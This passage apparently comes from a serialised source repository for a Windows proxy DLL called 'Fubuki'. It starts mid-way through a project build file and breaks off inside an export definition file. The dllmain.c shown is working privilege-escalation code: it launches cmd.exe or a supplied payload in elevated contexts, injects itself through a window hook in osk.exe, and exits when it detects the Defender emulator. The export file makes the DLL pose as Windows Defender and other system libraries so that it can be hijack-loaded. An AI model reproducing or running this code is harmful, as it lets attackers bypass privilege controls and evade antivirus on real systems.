<OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <EmbedManifest>false</EmbedManifest>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n    <EmbedManifest>false</EmbedManifest>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <MultiProcessorCompilation>\n      </MultiProcessorCompilation>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <StringPooling>true</StringPooling>\n      <ExceptionHandling>false</ExceptionHandling>\n      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <CreateHotpatchableImage>false</CreateHotpatchableImage>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <EntryPointSymbol>DllMain</EntryPointSymbol>\n      <Version>6.0</Version>\n      <ModuleDefinitionFile>export.def</ModuleDefinitionFile>\n      <IgnoreAllDefaultLibraries>\n      </IgnoreAllDefaultLibraries>\n      
<AdditionalDependencies>Shell32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <MultiProcessorCompilation>\n      </MultiProcessorCompilation>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>DllMain</EntryPointSymbol>\n      <Version>6.0</Version>\n      <ModuleDefinitionFile>export.def</ModuleDefinitionFile>\n      <AdditionalDependencies>Shell32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MinSpace</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <StringPooling>true</StringPooling>\n      <ExceptionHandling>false</ExceptionHandling>\n      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      
<CreateHotpatchableImage>false</CreateHotpatchableImage>\n      <CompileAs>CompileAsC</CompileAs>\n      <DebugInformationFormat>None</DebugInformationFormat>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>DllMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <Version>6.0</Version>\n      <ModuleDefinitionFile>export.def</ModuleDefinitionFile>\n      <IgnoreAllDefaultLibraries>\n      </IgnoreAllDefaultLibraries>\n      <AdditionalDependencies>Shell32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <LinkTimeCodeGeneration>UseLinkTimeCodeGeneration</LinkTimeCodeGeneration>\n    </Link>\n    <PostBuildEvent>\n      <Command>\n      </Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MinSpace</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <StringPooling>true</StringPooling>\n      <ExceptionHandling>false</ExceptionHandling>\n      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <CreateHotpatchableImage>false</CreateHotpatchableImage>\n      <CompileAs>CompileAsC</CompileAs>\n      
<DebugInformationFormat>None</DebugInformationFormat>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>DllMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <Version>6.0</Version>\n      <ModuleDefinitionFile>export.def</ModuleDefinitionFile>\n      <IgnoreAllDefaultLibraries>\n      </IgnoreAllDefaultLibraries>\n      <AdditionalDependencies>Shell32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <LinkTimeCodeGeneration>UseLinkTimeCodeGeneration</LinkTimeCodeGeneration>\n    </Link>\n    <PostBuildEvent>\n      <Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Fubuki32.dll</Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MinSpace</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <StringPooling>true</StringPooling>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      
<EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>DllMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <Version>6.0</Version>\n      <ModuleDefinitionFile>export.def</ModuleDefinitionFile>\n      <AdditionalDependencies>Shell32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n    <PostBuildEvent>\n      <Command>\n      </Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MinSpace</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <StringPooling>true</StringPooling>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>DllMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <Version>6.0</Version>\n      <ModuleDefinitionFile>export.def</ModuleDefinitionFile>\n      <AdditionalDependencies>Shell32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n    <PostBuildEvent>\n      <Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Fubuki64.dll</Command>\n    
</PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\Shared\\cmdline.c\" />\n    <ClCompile Include=\"..\\Shared\\u64tostr.c\" />\n    <ClCompile Include=\"..\\Shared\\ultohex.c\" />\n    <ClCompile Include=\"..\\Shared\\ultostr.c\" />\n    <ClCompile Include=\"..\\Shared\\util.c\" />\n    <ClCompile Include=\"..\\Shared\\windefend.c\" />\n    <ClCompile Include=\"..\\Shared\\_filename.c\" />\n    <ClCompile Include=\"..\\shared\\_strcat.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcmpi.c\" />\n    <ClCompile Include=\"..\\shared\\_strcpy.c\" />\n    <ClCompile Include=\"..\\Shared\\_strend.c\" />\n    <ClCompile Include=\"..\\Shared\\_strlen.c\" />\n    <ClCompile Include=\"..\\Shared\\_strncpy.c\" />\n    <ClCompile Include=\"..\\Shared\\_strstri.c\" />\n    <ClCompile Include=\"dllmain.c\" />\n    <ClCompile Include=\"pca.c\" />\n    <ClCompile Include=\"uihacks.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\Shared\\cmdline.h\" />\n    <ClInclude Include=\"..\\shared\\minirtl.h\" />\n    <ClInclude Include=\"..\\Shared\\shared.h\" />\n    <ClInclude Include=\"..\\Shared\\util.h\" />\n    <ClInclude Include=\"..\\Shared\\windefend.h\" />\n    <ClInclude Include=\"..\\Shared\\_filename.h\" />\n    <ClInclude Include=\"atldll.h\" />\n    <ClInclude Include=\"fubuki.h\" />\n    <ClInclude Include=\"pca.h\" />\n    <ClInclude Include=\"resource.h\" />\n    <ClInclude Include=\"uihacks.h\" />\n    <ClInclude Include=\"winmm.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"version.rc\" />\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"export.def\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Fubuki/dll.vcxproj.filters",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{04ee0fac-8cb1-42ba-8211-a3b0023677db}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\minirtl.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"fubuki.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\_filename.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"uihacks.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\cmdline.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"winmm.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\shared.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\windefend.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\util.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n 
   <ClInclude Include=\"pca.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"atldll.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"version.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"dllmain.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_filename.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\ultostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strncpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strstri.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\u64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\ultohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"uihacks.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\cmdline.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\util.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\windefend.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile 
Include=\"pca.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"export.def\">\n      <Filter>Source Files</Filter>\n    </None>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Fubuki/dll.vcxproj.user",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"12.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n</Project>"
  },
  {
    "path": "Source/Fubuki/dllmain.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n*  TITLE:       DLLMAIN.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  Proxy dll entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"fubuki.h\"\n\nUACME_PARAM_BLOCK g_SharedParams;\nHANDLE g_SyncMutant = NULL;\n\n/*\n* DummyFunc\n*\n* Purpose:\n*\n* Stub for fake exports.\n*\n*/\nVOID WINAPI DummyFunc(\n    VOID\n)\n{\n}\n\n/*\n* DefaultPayload\n*\n* Purpose:\n*\n* Process parameter if exist or start cmd.exe and exit immediately.\n*\n*/\nVOID DefaultPayload(\n    VOID\n)\n{\n    BOOL bSharedParamsReadOk;\n    UINT ExitCode;\n    PWSTR lpParameter;\n    ULONG cbParameter;\n\n    ucmDbgMsg(LoadedMsg);\n\n    //\n    // Read shared params block.\n    //\n    RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n    bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n    if (bSharedParamsReadOk) {\n        ucmDbgMsg(L\"Fubuki, ucmReadSharedParameters OK\\r\\n\");\n\n        lpParameter = g_SharedParams.szParameter;\n        cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n    }\n    else {\n        ucmDbgMsg(L\"Fubuki, ucmReadSharedParameters Failed\\r\\n\");\n        lpParameter = NULL;\n        cbParameter = 0UL;\n    }\n\n    ucmDbgMsg(L\"Fubuki, before ucmLaunchPayload\\r\\n\");\n\n    ExitCode = (ucmLaunchPayload(lpParameter, cbParameter) != FALSE);\n\n    ucmDbgMsg(L\"Fubuki, after ucmLaunchPayload\\r\\n\");\n    if (ExitCode == 0) {\n        ucmDbgMsg(L\"Fubuki, ucmLaunchPayload failed\\r\\n\");\n    }\n\n    //\n    // If this is default executable, show runtime 
info.\n    //\n    if ((lpParameter == NULL) || (cbParameter == 0)) {\n        if (g_SharedParams.AkagiFlag == AKAGI_FLAG_TANGO)\n            ucmQueryRuntimeInfo(FALSE);\n    }\n\n    //\n    // Notify Akagi.\n    //\n    if (bSharedParamsReadOk) {\n        ucmDbgMsg(L\"Fubuki, completion\\r\\n\");\n        ucmSetCompletion(g_SharedParams.szSignalObject);\n    }\n\n    RtlExitUserProcess(ExitCode);\n}\n\n/*\n* UiAccessMethodHookProc\n*\n* Purpose:\n*\n* Window hook procedure for UiAccessMethod\n*\n*/\nLRESULT CALLBACK UiAccessMethodHookProc(\n    _In_ int nCode,\n    _In_ WPARAM wParam,\n    _In_ LPARAM lParam\n)\n{\n    return CallNextHookEx(NULL, nCode, wParam, lParam);\n}\n\n/*\n* UiAccessMethodPayload\n*\n* Purpose:\n*\n* Defines application context and either:\n* - if fInstallHook set - installs windows hook for dll injection\n* - run default payload in target app context\n*\n*/\nVOID UiAccessMethodPayload(\n    _In_ HINSTANCE hinstDLL,\n    _In_ BOOL fInstallHook,\n    _In_opt_ LPWSTR lpTargetApp\n)\n{\n    LPWSTR lpFileName;\n    HHOOK hHook;\n    HOOKPROC HookProcedure;\n    TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;\n    WCHAR szModuleName[MAX_PATH + 1];\n\n    RtlSecureZeroMemory(szModuleName, sizeof(szModuleName));\n    if (GetModuleFileName(NULL, szModuleName, MAX_PATH) == 0)\n        return;\n\n    lpFileName = _filename(szModuleName);\n    if (lpFileName == NULL)\n        return;\n\n    if (fInstallHook) {\n\n        //\n        // Check if we are in the required application context\n        // Are we inside osk.exe?\n        //\n        if (_strcmpi(lpFileName, TEXT(\"osk.exe\")) == 0) {\n            HookProcedure = (HOOKPROC)GetProcAddress(hinstDLL, FUBUKI_WND_HOOKPROC); //UiAccessMethodHookProc\n            if (HookProcedure) {\n                hHook = SetWindowsHookEx(WH_CALLWNDPROC, HookProcedure, hinstDLL, 0);\n                if (hHook) {\n                    //\n                    // Timeout to be enough to spawn target 
app.\n                    //\n                    Sleep(15000);\n                    UnhookWindowsHookEx(hHook);\n                }\n            }\n            RtlExitUserProcess(0);\n        }\n    }\n\n    //\n    // If target application name specified - check are we inside target app?\n    //\n    if (lpTargetApp) {\n        if (_strcmpi(lpFileName, lpTargetApp) == 0) {\n            DefaultPayload();\n        }\n    }\n    else {\n        //\n        // Use any suitable elevated context.\n        //\n        if (ucmGetProcessElevationType(NULL, &TokenType)) {\n            if (TokenType == TokenElevationTypeFull) {\n                DefaultPayload();\n            }\n        }\n    }\n}\n\n/*\n* UiAccessMethodDllMain\n*\n* Purpose:\n*\n* Proxy dll entry point for uiAccess method.\n* Need dedicated entry point because of additional code.\n*\n*/\nBOOL WINAPI UiAccessMethodDllMain(\n    _In_ HINSTANCE hinstDLL,\n    _In_ DWORD fdwReason,\n    _In_ LPVOID lpvReserved\n)\n{\n    WCHAR szMMC[] = { L'm', L'm', L'c', L'.', L'e', L'x', L'e', 0 };\n    UNREFERENCED_PARAMETER(lpvReserved);\n\n    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n        RtlExitUserProcess('foff');\n    }\n\n    if (fdwReason == DLL_PROCESS_ATTACH) {\n        UiAccessMethodPayload(hinstDLL, TRUE, szMMC);\n    }\n\n    return TRUE;\n}\n\n/*\n* DllMain\n*\n* Purpose:\n*\n* Default proxy dll entry point.\n*\n*/\nBOOL WINAPI DllMain(\n    _In_ HINSTANCE hinstDLL,\n    _In_ DWORD fdwReason,\n    _In_ LPVOID lpvReserved\n)\n{\n    UNREFERENCED_PARAMETER(hinstDLL);\n    UNREFERENCED_PARAMETER(lpvReserved);\n   \n    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n        RtlExitUserProcess('foff');\n    }\n\n    if (fdwReason == DLL_PROCESS_ATTACH) {\n        DefaultPayload();\n    }\n\n    return TRUE;\n}\n\n/*\n* EntryPointExeMode\n*\n* Purpose:\n*\n* Entry point to be used in exe mode.\n*\n*/\nVOID WINAPI EntryPointExeMode(\n    VOID\n)\n{\n    if (wdIsEmulatorPresent() != 
STATUS_NOT_SUPPORTED) {\n        RtlExitUserProcess('foff');\n    }\n    DefaultPayload();\n}\n\n/*\n* EntryPointUIAccessLoader\n*\n* Purpose:\n*\n* Entry point to be used in exe mode.\n*\n*/\nVOID WINAPI EntryPointUIAccessLoader(\n    VOID\n)\n{\n    ULONG r = 0;\n    WCHAR szParam[MAX_PATH * 2];\n\n    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n        RtlExitUserProcess('foff');\n    }\n\n    if (GetCommandLineParam(GetCommandLine(), 0, szParam, MAX_PATH, &r)) {\n        if (r > 0) {\n            ucmUIHackExecute(szParam);\n        }\n    }\n    RtlExitUserProcess(0);\n}\n\n/*\n* EntryPointUIAccessLoader2\n*\n* Purpose:\n*\n* Entry point to be used in exe mode.\n*\n*/\nVOID WINAPI EntryPointUIAccessLoader2(\n    VOID\n)\n{\n    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n        RtlExitUserProcess('foff');\n    }\n    ucmUIHackExecute2();\n    \n    RtlExitUserProcess(0);\n}\n\n/*\n* EntryPointSxsConsent\n*\n* Purpose:\n*\n* Entry point to be used by consent sxs method.\n*\n*/\nBOOL WINAPI EntryPointSxsConsent(\n    _In_ HINSTANCE hinstDLL,\n    _In_ DWORD fdwReason,\n    _In_ LPVOID lpvReserved\n)\n{\n    BOOL bSharedParamsReadOk;\n    PWSTR lpParameter;\n    ULONG cbParameter;\n\n    UNREFERENCED_PARAMETER(lpvReserved);\n\n    ucmDbgMsg(LoadedMsg);\n\n    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED)\n        RtlExitUserProcess('foff');\n\n\n    if (fdwReason == DLL_PROCESS_ATTACH) {\n\n        LdrDisableThreadCalloutsForDll(hinstDLL);\n\n        //\n        // Read shared params block.\n        //\n        RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n        bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n        if (bSharedParamsReadOk) {\n            lpParameter = g_SharedParams.szParameter;\n            cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n        }\n        else {\n            lpParameter = NULL;\n            cbParameter = 0UL;\n        }\n\n        
ucmLaunchPayloadEx(\n            CreateProcessW,\n            lpParameter,\n            cbParameter);\n\n        //\n        // Notify Akagi.\n        //\n        if (bSharedParamsReadOk) {\n            ucmSetCompletion(g_SharedParams.szSignalObject);\n        }\n\n    }\n    return TRUE;\n}\n\n/*\n* EntryPointBackupLocked\n*\n* Purpose:\n*\n* Entry point to be used by QuickAssist method.\n*\n*/\nBOOL WINAPI EntryPointBackupLocked(\n    _In_ HINSTANCE hinstDLL,\n    _In_ DWORD fdwReason,\n    _In_ LPVOID lpvReserved\n)\n{\n    BOOL bSharedParamsReadOk;\n    PWSTR lpParameter;\n    ULONG cbParameter;\n\n    UNREFERENCED_PARAMETER(lpvReserved);\n\n    ucmDbgMsg(LoadedMsg);\n\n    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED)\n        RtlExitUserProcess('foff');\n\n    if (fdwReason == DLL_PROCESS_ATTACH) {\n\n        ucmHideMainWindow();\n        LdrDisableThreadCalloutsForDll(hinstDLL);\n\n        //\n        // Read shared params block.\n        //\n        RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n        bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n        if (bSharedParamsReadOk) {\n            lpParameter = g_SharedParams.szParameter;\n            cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n        }\n        else {\n            lpParameter = NULL;\n            cbParameter = 0UL;\n        }\n\n        ucmLaunchPayload3(lpParameter, cbParameter);\n\n        //\n        // Notify Akagi.\n        //\n        if (bSharedParamsReadOk) {\n            ucmSetCompletion(g_SharedParams.szSignalObject);\n        }\n    }\n\n    return TRUE;\n}\n"
  },
  {
    "path": "Source/Fubuki/export.def",
    "content": "EXPORTS\n;DllRegisterServer           = DummyFunc PRIVATE\n\n; WOW64LOG\nWow64LogSystemService\t\t= DummyFunc\nWow64LogInitialize\t\t\t= DummyFunc\nWow64LogTerminate\t\t\t= DummyFunc\nWow64LogMessageArgList\t\t= DummyFunc\n\n; COMMCTL\nTaskDialogIndirect          = DummyFunc @345\n\n; Main routines\nMpManagerOpen               = UiAccessMethodDllMain\nMpHandleClose               = UiAccessMethodHookProc\nMpScanStart                 = EntryPointExeMode\nMpScanControl               = EntryPointUIAccessLoader\nMpUpdateEngine              = EntryPointUIAccessLoader2\nMpThreatOpen                = EntryPointSxsConsent\nMpThreatEnumerate           = EntryPointBackupLocked\nMpManagerStatusQuery        = pcaEntryPointLoader\nMpManagerStatusQueryEx      = pcaEntryPointDll\n\n; MSCOREE.DLL\nClrCreateManagedInstance    = DummyFunc\nCorBindToRuntimeEx          = DummyFunc\nLoadLibraryShim             = DummyFunc\n\n; OSKSUPPORT.DLL\nInitializeOSKSupport        = DummyFunc\nUninitializeOSKSupport      = DummyFunc\n\n; DUSER.DLL\nInvalidateGadget            = DummyFunc\n\n; GDIPLUS\nGdipAlloc                   = DummyFunc\nGdipCloneImage              = DummyFunc\nGdipCreateBitmapFromStream  = DummyFunc\nGdipCreateFromHDC           = DummyFunc\nGdipCreateHBITMAPFromBitmap = DummyFunc\nGdipCreateLineBrushI        = DummyFunc\nGdipCreateSolidFill         = DummyFunc\nGdipDeleteBrush             = DummyFunc\nGdipDeleteGraphics          = DummyFunc\nGdipDisposeImage            = DummyFunc\nGdipFillRectangleI          = DummyFunc\nGdipFree                    = DummyFunc\nGdiplusShutdown             = 